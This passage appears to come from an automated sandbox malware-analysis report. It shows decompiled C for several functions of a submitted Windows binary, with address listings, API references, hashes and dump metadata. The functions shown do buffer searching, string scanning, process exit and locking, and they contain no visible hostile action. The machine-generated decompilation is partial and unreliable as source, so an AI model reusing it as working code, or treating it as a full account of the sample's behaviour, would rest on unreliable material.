								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
								_t129 =  *((intOrPtr*)(_t138 - 0x18));
								goto L46;
							} else {
								_t123 =  *((intOrPtr*)(_t138 - 0x18));
								_t88 = _t123 + _t87 * 2 - 2;
								while(1) {
									__eflags =  *_t88 - _t132;
									if( *_t88 == _t132) {
										break;
									}
									__eflags = _t88 - _t123;
									if(_t88 == _t123) {
										_t135 = _t135 | 0xffffffff;
										__eflags = _t135;
									} else {
										_t88 = _t88;
										continue;
									}
									L23:
									__eflags = _t135;
									if(__eflags < 0 || __eflags == 0) {
										goto L44;
									} else {
										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
											goto L44;
										} else {
											_t92 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
											 *(_t138 - 4) = 3;
											E00401D7A(_t138 - 0x18, _t92);
											 *(_t138 - 4) = 1;
											E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
											goto L14;
										}
									}
									goto L47;
								}
								_t135 = _t88 - _t123 >> 1;
								goto L23;
							}
						}
						goto L47;
					}
					E00401D7A(_t138 - 0x18, _t138 - 0x24);
					while(1) {
						L34:
						_t45 = _t138 - 0x14; // 0x414be4
						__eflags = _t135 -  *_t45;
						if(_t135 >=  *_t45) {
							break;
						}
						_t130 =  *((intOrPtr*)(_t138 - 0x18));
						_t70 = _t130 + 2 + _t135 * 2;
						while(1) {
							_t116 =  *_t70;
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								break;
							}
							__eflags = _t116;
							if(_t116 == 0) {
								_t135 = _t135 | 0xffffffff;
								__eflags = _t135;
							} else {
								_t70 = _t70 + 2;
								continue;
							}
							L41:
							__eflags = _t135;
							if(_t135 < 0) {
								_t50 = _t138 - 0x14; // 0x414be4
								_t135 =  *_t50;
							}
							_t74 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
							 *(_t138 - 4) = 4;
							_t75 = E0040499C( *_t74);
							 *(_t138 - 4) = 1;
							asm("sbb bl, bl");
							E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
							__eflags =  ~_t75 + 1;
							if( ~_t75 + 1 == 0) {
								goto L34;
							} else {
								goto L44;
							}
							goto L45;
						}
						_t135 = _t70 - _t130 >> 1;
						goto L41;
					}
					_t102 = 1;
					goto L45;
				} else {
					_t128 =  *((intOrPtr*)(_t138 - 0x18));
					_t96 = _t128 + _t109 * 2 - 2;
					while( *_t96 != _t132) {
						if(_t96 == _t128) {
							_t98 = _t96 | 0xffffffff;
							__eflags = _t98;
						} else {
							_t96 = _t96;
							continue;
						}
						L7:
						__eflags = _t98;
						if(_t98 <= 0) {
							goto L13;
						} else {
							__eflags = _t98 - _t109 - 1;
							if(_t98 != _t109 - 1) {
								goto L13;
							} else {
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									L12:
									E004023EE(_t138 - 0x18, _t98, 1);
									goto L13;
								} else {
									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
									if( *((short*)(_t128 + 2)) != 0x3a) {
										goto L12;
									} else {
										_t102 = 1;
										L46:
										E00403A9C(_t129);
									}
								}
							}
						}
						goto L47;
					}
					_t98 = _t96 - _t128 >> 1;
					goto L7;
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return _t102;
			}

























                              0x004049e2
                              0x004049f1
                              0x004049f6
                              0x004049f6
                              0x004049f9
                              0x00404a01
                              0x00404a02
                              0x00404a4a
                              0x00404a51
                              0x00404a56
                              0x00404a56
                              0x00404a59
                              0x00404a5d
                              0x00404a5d
                              0x00404a60
                              0x00404a65
                              0x00404a67
                              0x00000000
                              0x00000000
                              0x00404a6d
                              0x00404a73
                              0x00404a78
                              0x00404aed
                              0x00404af2
                              0x00404af8
                              0x00404afc
                              0x00404b01
                              0x00404b03
                              0x00404b0c
                              0x00404b0f
                              0x00404b11
                              0x00404b38
                              0x00404b3c
                              0x00000000
                              0x00404b13
                              0x00404b13
                              0x00404b13
                              0x00000000
                              0x00404b13
                              0x00404b05
                              0x00404b05
                              0x00404b15
                              0x00404b18
                              0x00404b20
                              0x00404b28
                              0x00404b2d
                              0x00404a7a
                              0x00404a7a
                              0x00404a7a
                              0x00404a7d
                              0x00404a7f
                              0x00404bb2
                              0x00404bb2
                              0x00404bb2
                              0x00404bb4
                              0x00404bb7
                              0x00404bbc
                              0x00000000
                              0x00404a85
                              0x00404a85
                              0x00404a88
                              0x00404a8c
                              0x00404a8c
                              0x00404a8f
                              0x00000000
                              0x00000000
                              0x00404a91
                              0x00404a93
                              0x00404aa1
                              0x00404aa1
                              0x00404a95
                              0x00404a96
                              0x00000000
                              0x00404a96
                              0x00404aa4
                              0x00404aa4
                              0x00404aa6
                              0x00000000
                              0x00404ab2
                              0x00404ab2
                              0x00404ab8
                              0x00000000
                              0x00404abe
                              0x00404ac6
                              0x00404acf
                              0x00404ad3
                              0x00404ad8
                              0x00404adf
                              0x00000000
                              0x00404ae4
                              0x00404ab8
                              0x00000000
                              0x00404aa6
                              0x00404a9d
                              0x00000000
                              0x00404a9d
                              0x00404a7f
                              0x00000000
                              0x00404a78
                              0x00404b49
                              0x00404b4e
                              0x00404b4e
                              0x00404b4e
                              0x00404b4e
                              0x00404b51
                              0x00000000
                              0x00000000
                              0x00404b57
                              0x00404b5a
                              0x00404b5e
                              0x00404b5e
                              0x00404b61
                              0x00404b64
                              0x00000000
                              0x00000000
                              0x00404b66
                              0x00404b69
                              0x00404b77
                              0x00404b77
                              0x00404b6b
                              0x00404b6c
                              0x00000000
                              0x00404b6c
                              0x00404b7a
                              0x00404b7a
                              0x00404b7c
                              0x00404b7e
                              0x00404b7e
                              0x00404b7e
                              0x00404b89
                              0x00404b90
                              0x00404b94
                              0x00404b9b
                              0x00404ba4
                              0x00404ba8
                              0x00404bad
                              0x00404bb0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00404bb0
                              0x00404b73
                              0x00000000
                              0x00404b73
                              0x00404bd8
                              0x00000000
                              0x00404a04
                              0x00404a04
                              0x00404a07
                              0x00404a0b
                              0x00404a12
                              0x00404a1e
                              0x00404a1e
                              0x00404a14
                              0x00404a15
                              0x00000000
                              0x00404a15
                              0x00404a21
                              0x00404a21
                              0x00404a23
                              0x00000000
                              0x00404a25
                              0x00404a28
                              0x00404a2a
                              0x00000000
                              0x00404a2c
                              0x00404a2c
                              0x00404a2f
                              0x00404a3f
                              0x00404a45
                              0x00000000
                              0x00404a31
                              0x00404a31
                              0x00404a36
                              0x00000000
                              0x00404a38
                              0x00404a38
                              0x00404bc0
                              0x00404bc1
                              0x00404bc6
                              0x00404a36
                              0x00404a2f
                              0x00404a2a
                              0x00000000
                              0x00404a23
                              0x00404a1a
                              0x00000000
                              0x00404a1a
                              0x00404bc7
                              0x00404bcf
                              0x00404bd7

                              APIs
                              • __EH_prolog.LIBCMT ref: 004049E2
                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID: KA
                              • API String ID: 1057991267-4133974868
                              • Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
                              • Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401AF4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1028 401af4-401b2e call 413954 call 413cc0 call 405b6d 1035 401b30-401b3e call 405975 1028->1035 1036 401b43-401b49 1028->1036 1044 401c6b-401c78 1035->1044 1038 401b57-401b60 1036->1038 1039 401b4b-401b55 1036->1039 1041 401b62-401b6c 1038->1041 1042 401b6e-401b7b 1038->1042 1039->1038 1039->1039 1041->1041 1041->1042 1043 401b7f-401b96 call 405bca 1042->1043 1046 401b9b-401b9d 1043->1046 1047 401ba3-401ba8 1046->1047 1048 401c5a 1046->1048 1049 401c56-401c58 1047->1049 1050 401bae-401bb0 1047->1050 1051 401c5c-401c6a call 405975 1048->1051 1049->1051 1052 401bb6-401bbc 1050->1052 1051->1044 1054 401bf0-401bf5 1052->1054 1055 401bbe-401bc3 1052->1055 1057 401c16-401c3b call 413980 1054->1057 1058 401bf7-401c08 call 4134d0 1054->1058 1055->1057 1059 401bc5-401bd6 call 4134d0 1055->1059 1068 401c4a-401c54 1057->1068 1069 401c3d-401c44 1057->1069 1066 401c0a-401c14 1058->1066 1067 401bec-401bee 1058->1067 1059->1049 1070 401bd8-401bdf 1059->1070 1066->1052 1067->1052 1068->1051 1069->1068 1071 401b7d 1069->1071 1070->1048 1072 401be1-401be7 call 401ee5 1070->1072 1071->1043 1072->1067
                              C-Code - Quality: 93%
                              			E00401AF4(void* __ecx, intOrPtr __edx, void* __eflags) {
				signed char** _t64;
				char* _t67;
				void* _t71;
				signed int _t73;
				intOrPtr _t74;
				void* _t75;
				void* _t81;
				void* _t83;
				char _t84;
				signed int _t89;
				signed int _t91;
				void* _t92;
				signed int _t103;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t112;

				_t92 = __ecx;
				E00413954(E004190C8, _t110);
				E00413CC0(0x1024, __ecx);
				_t64 =  *(_t110 + 0xc);
				_t103 = 0;
				_t64[1] = 0;
				 *((intOrPtr*)(_t110 - 0x30)) = __edx;
				 *( *_t64) =  *( *_t64) & 0x00000000;
				 *(_t110 - 0x1c) =  *(_t110 - 0x1c) | 0xffffffff;
				 *(_t110 - 4) = 0;
				if(E00405B6D(_t92) != 0) {
					 *((intOrPtr*)(_t110 - 0x14)) = 0;
					if( *((char*)(__edx)) != 0) {
						do {
							 *((intOrPtr*)(_t110 - 0x14)) =  *((intOrPtr*)(_t110 - 0x14)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x14)) + __edx)) != 0);
					}
					_t67 =  *((intOrPtr*)(_t110 + 8));
					 *((intOrPtr*)(_t110 - 0x18)) = _t103;
					if( *_t67 != 0) {
						do {
							 *((intOrPtr*)(_t110 - 0x18)) =  *((intOrPtr*)(_t110 - 0x18)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x18)) + _t67)) != 0);
					}
					_t107 = 0;
					 *(_t110 - 0xd) =  *(_t110 - 0xd) & 0x00000000;
					 *((intOrPtr*)(_t110 - 0x24)) = _t103;
					 *((intOrPtr*)(_t110 - 0x20)) = _t103;
					while(1) {
						L8:
						_t71 = E00405BCA(_t110 - 0x1c, _t110 + _t107 - 0x1030, 0x1000 - _t107, _t110 - 0x28); // executed
						if(_t71 == 0) {
							break;
						}
						_t74 =  *((intOrPtr*)(_t110 - 0x28));
						if(_t74 == _t103) {
							L23:
							_t89 = 1;
						} else {
							_t109 = _t107 + _t74;
							_t91 = _t110 - 0x1030;
							while(1) {
								_t75 = _t109;
								if( *(_t110 - 0xd) != 0) {
								}
								L12:
								if(_t103 > _t75 -  *((intOrPtr*)(_t110 - 0x18))) {
									L20:
									_t107 = _t109 - _t103;
									 *((intOrPtr*)(_t110 - 0x24)) =  *((intOrPtr*)(_t110 - 0x24)) + _t103;
									asm("adc dword [ebp-0x20], 0x0");
									E00413980(_t110 - 0x1030, _t110 + _t103 - 0x1030, _t107);
									_t112 = _t112 + 0xc;
									if( *((intOrPtr*)(_t110 - 0x20)) > 0 ||  *((intOrPtr*)(_t110 - 0x24)) > 0x100000) {
										_t89 = _t91 & 0xffffff00 | ( *(_t110 + 0xc))[1] == 0x00000000;
									} else {
										_t103 = 0;
										goto L8;
									}
								} else {
									_t83 = E004134D0(_t91,  *((intOrPtr*)(_t110 + 8)),  *((intOrPtr*)(_t110 - 0x18)));
									_t112 = _t112 + 0xc;
									if(_t83 == 0) {
										goto L23;
									} else {
										_t84 =  *_t91;
										 *((char*)(_t110 - 0x2c)) = _t84;
										if(_t84 == 0) {
											goto L24;
										} else {
											E00401EE5( *(_t110 + 0xc),  *((intOrPtr*)(_t110 - 0x2c)));
											L16:
											_t103 = _t103 + 1;
											_t91 = _t91 + 1;
											while(1) {
												_t75 = _t109;
												if( *(_t110 - 0xd) != 0) {
												}
												goto L17;
											}
											goto L12;
										}
									}
								}
								goto L25;
								L17:
								_t39 = _t110 - 0x14; // 0x414be4
								if(_t103 > _t75 -  *_t39) {
									goto L20;
								} else {
									_t40 = _t110 - 0x14; // 0x414be4
									_t81 = E004134D0(_t91,  *((intOrPtr*)(_t110 - 0x30)),  *_t40);
									_t112 = _t112 + 0xc;
									if(_t81 != 0) {
										goto L16;
									} else {
										_t103 = _t103 +  *((intOrPtr*)(_t110 - 0x14));
										_t91 = _t91 +  *((intOrPtr*)(_t110 - 0x14));
										 *(_t110 - 0xd) = 1;
										continue;
									}
									goto L26;
								}
								goto L25;
							}
						}
						L25:
						 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
						E00405975(_t110 - 0x1c);
						_t73 = _t89;
						goto L26;
					}
					L24:
					_t89 = 0;
					goto L25;
				} else {
					 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
					E00405975(_t110 - 0x1c);
					_t73 = 0;
				}
				L26:
				 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
				return _t73;
			}




















                              0x00401af4
                              0x00401af9
                              0x00401b03
                              0x00401b08
                              0x00401b0d
                              0x00401b11
                              0x00401b16
                              0x00401b19
                              0x00401b1c
                              0x00401b24
                              0x00401b2e
                              0x00401b46
                              0x00401b49
                              0x00401b4b
                              0x00401b4b
                              0x00401b51
                              0x00401b4b
                              0x00401b57
                              0x00401b5a
                              0x00401b60
                              0x00401b62
                              0x00401b62
                              0x00401b68
                              0x00401b62
                              0x00401b6e
                              0x00401b70
                              0x00401b75
                              0x00401b78
                              0x00401b7f
                              0x00401b7f
                              0x00401b96
                              0x00401b9d
                              0x00000000
                              0x00000000
                              0x00401ba3
                              0x00401ba8
                              0x00401c56
                              0x00401c56
                              0x00401bae
                              0x00401bae
                              0x00401bb0
                              0x00401bb6
                              0x00401bba
                              0x00401bbc
                              0x00401bbc
                              0x00401bbe
                              0x00401bc3
                              0x00401c16
                              0x00401c16
                              0x00401c18
                              0x00401c2a
                              0x00401c2f
                              0x00401c34
                              0x00401c3b
                              0x00401c51
                              0x00401b7d
                              0x00401b7d
                              0x00000000
                              0x00401b7d
                              0x00401bc5
                              0x00401bcc
                              0x00401bd1
                              0x00401bd6
                              0x00000000
                              0x00401bd8
                              0x00401bd8
                              0x00401bdc
                              0x00401bdf
                              0x00000000
                              0x00401be1
                              0x00401be7
                              0x00401bec
                              0x00401bec
                              0x00401bed
                              0x00401bb6
                              0x00401bba
                              0x00401bbc
                              0x00401bbc
                              0x00000000
                              0x00401bbc
                              0x00000000
                              0x00401bb6
                              0x00401bdf
                              0x00401bd6
                              0x00000000
                              0x00401bf0
                              0x00401bf0
                              0x00401bf5
                              0x00000000
                              0x00401bf7
                              0x00401bf7
                              0x00401bfe
                              0x00401c03
                              0x00401c08
                              0x00000000
                              0x00401c0a
                              0x00401c0a
                              0x00401c0d
                              0x00401c10
                              0x00000000
                              0x00401c10
                              0x00000000
                              0x00401c08
                              0x00000000
                              0x00401bf5
                              0x00401bb6
                              0x00401c5c
                              0x00401c5c
                              0x00401c63
                              0x00401c68
                              0x00000000
                              0x00401c6a
                              0x00401c5a
                              0x00401c5a
                              0x00000000
                              0x00401b30
                              0x00401b30
                              0x00401b37
                              0x00401b3c
                              0x00401b3c
                              0x00401c6b
                              0x00401c70
                              0x00401c78

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: KA$KA
                              • API String ID: 3519838083-594506476
                              • Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
                              • Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                              • Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00416CB8 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1074 416cb8-416cc7 call 416d5d 1077 416cc9-416cd4 GetCurrentProcess TerminateProcess 1074->1077 1078 416cda-416cf0 1074->1078 1077->1078 1079 416cf2-416cf9 1078->1079 1080 416d2e-416d42 call 416d6f 1078->1080 1081 416cfb-416d07 1079->1081 1082 416d1d-416d2d call 416d6f 1079->1082 1091 416d44-416d4a call 416d66 1080->1091 1092 416d4b-416d55 ExitProcess 1080->1092 1084 416d09-416d0d 1081->1084 1085 416d1c 1081->1085 1082->1080 1088 416d11-416d1a 1084->1088 1089 416d0f 1084->1089 1085->1082 1088->1084 1088->1085 1089->1088
                              C-Code - Quality: 80%
                              			E00416CB8(void* __esi, int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E00416D5D();
				_t23 = 1;
				_t27 =  *0x423400 - _t23; // 0x1
				if(_t27 == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				_t16 = _a12;
				 *0x4233fc = _t23;
				 *0x4233f8 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x425a10; // 0x20504c8
					if(_t9 != 0) {
						_t22 =  *0x425a0c; // 0x20504d0
						_push(_t24);
						_t4 = _t22 - 4; // 0x20504cc
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x425a10; // 0x20504c8
							} while (_t32 >= 0);
						}
					}
					E00416D6F(0x420044, 0x420048);
				}
				E00416D6F(0x42004c, 0x420054);
				if(_t16 == 0) {
					 *0x423400 = _t23; // executed
					ExitProcess(_a4);
				}
				return E00416D66();
			}












                              0x00416cb8
                              0x00416cb9
                              0x00416cc0
                              0x00416cc1
                              0x00416cc7
                              0x00416cd4
                              0x00416cd4
                              0x00416ce0
                              0x00416ce4
                              0x00416cea
                              0x00416cf0
                              0x00416cf2
                              0x00416cf9
                              0x00416cfb
                              0x00416d01
                              0x00416d02
                              0x00416d02
                              0x00416d07
                              0x00416d09
                              0x00416d09
                              0x00416d0d
                              0x00416d0f
                              0x00416d0f
                              0x00416d11
                              0x00416d14
                              0x00416d14
                              0x00416d09
                              0x00416d1c
                              0x00416d27
                              0x00416d2d
                              0x00416d38
                              0x00416d42
                              0x00416d4f
                              0x00416d55
                              0x00416d55
                              0x00416d4a

                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CCD
                              • TerminateProcess.KERNEL32(00000000,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CD4
                              • ExitProcess.KERNEL32 ref: 00416D55
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction ID: 207b1b8771569bb39d21ff3be241c2a042127402aedffa1bc22b33ac5a943006
                              • Opcode Fuzzy Hash: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction Fuzzy Hash: 7A01C4323002119BD630AF69FC86A9A7BA5FB41715BA2802FF45057151DB7CD8C28B5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00407093 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1095 407093-4070c7 call 413954 EnterCriticalSection call 4065b2 1099 4070c9-4070d7 call 406505 1095->1099 1100 4070da-4070f2 LeaveCriticalSection 1095->1100 1099->1100
                              C-Code - Quality: 100%
                              			E00407093(intOrPtr* __ecx) {
				intOrPtr* _t15;
				void* _t16;
				void* _t22;
				struct _CRITICAL_SECTION* _t23;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t29;
				void* _t30;

				E00413954(E00419874, _t30);
				_t26 = __ecx;
				_t23 = __ecx + 4;
				 *(_t30 - 0x10) = _t23;
				EnterCriticalSection(_t23);
				_t15 =  *_t26;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
				if(_t16 == 0) {
					_t29 =  *_t26;
					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
				}
				LeaveCriticalSection(_t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}











                              0x00407098
                              0x0040709f
                              0x004070a2
                              0x004070a6
                              0x004070a9
                              0x004070af
                              0x004070b5
                              0x004070c2
                              0x004070c7
                              0x004070cc
                              0x004070d7
                              0x004070d7
                              0x004070dd
                              0x004070ea
                              0x004070f2

                              APIs
                              • __EH_prolog.LIBCMT ref: 00407098
                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070A9
                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070DD
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction ID: a56bdc6fde0de93627b634a906b5586fd045a2fb55df8f4462ae58feb39c4b8d
                              • Opcode Fuzzy Hash: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction Fuzzy Hash: D7018176A00204EFCB118F94CC08B9ABBB5FF48715F00841AFD12E7250C3B4A910CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040DD8B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1103 40dd8b-40ddb0 call 413954 call 40776f 1108 40ddb6-40ddbf call 40df2c 1103->1108 1109 40df1b-40df29 1103->1109 1112 40ddc1-40ddc3 1108->1112 1113 40ddc8-40ddfe call 4076d5 call 414090 1108->1113 1112->1109 1118 40de01-40de06 1113->1118 1119 40de25-40de47 call 406505 1118->1119 1120 40de08-40de15 1118->1120 1126 40df07 1119->1126 1127 40de4d-40de55 1119->1127 1121 40decb-40dece 1120->1121 1122 40de1b 1120->1122 1124 40df09-40df19 call 403a9c 1121->1124 1122->1119 1125 40de1d-40de1f 1122->1125 1124->1109 1125->1119 1125->1121 1126->1124 1127->1121 1129 40de57-40de5b 1127->1129 1129->1119 1131 40de5d-40de6d 1129->1131 1132 40dec6-40dec9 1131->1132 1133 40de6f 1131->1133 1134 40deaa-40dec1 call 413980 1132->1134 1135 40de77 1133->1135 1134->1118 1137 40de7a-40de7e 1135->1137 1139 40de80-40de82 1137->1139 1140 40de8a 1137->1140 1141 40de84-40de88 1139->1141 1142 40de8c 1139->1142 1140->1142 1141->1137 1142->1134 1143 40de8e-40de97 call 40df2c 1142->1143 1146 40ded0-40df04 call 414090 call 4065b2 1143->1146 1147 40de99-40dea2 1143->1147 1146->1126 1148 40de71-40de74 1147->1148 1149 40dea4-40dea7 1147->1149 1148->1135 1149->1134
                              C-Code - Quality: 95%
                              			E0040DD8B(void* __ecx, void* __eflags) {
				intOrPtr _t57;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;

				E00413954(E0041A630, _t116);
				_t119 = _t118 - 0x20;
				_t113 = __ecx;
				_t83 = __ecx + 0x28;
				_t107 = 0x20;
				_t57 = E0040776F(__eflags, _t107); // executed
				if(_t57 == 0) {
					if(E0040DF2C(_t83) == 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
						 *((intOrPtr*)(_t116 - 0x28)) = 0;
						 *((intOrPtr*)(_t116 - 0x24)) = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						E004076D5(_t116 - 0x2c, 0x10000);
						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
						E00414090( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
						_t109 =  *((intOrPtr*)(_t113 + 0x20));
						_t85 =  *((intOrPtr*)(_t113 + 0x24));
						_t121 = _t119 + 0xc;
						while(1) {
							L4:
							_t100 =  *((intOrPtr*)(_t116 + 0xc));
							__eflags = _t100;
							if(_t100 == 0) {
								goto L8;
							}
							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
							asm("sbb eax, [esi+0x24]");
							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
							if(__eflags > 0) {
								L25:
								_t115 = 1;
							} else {
								if(__eflags < 0) {
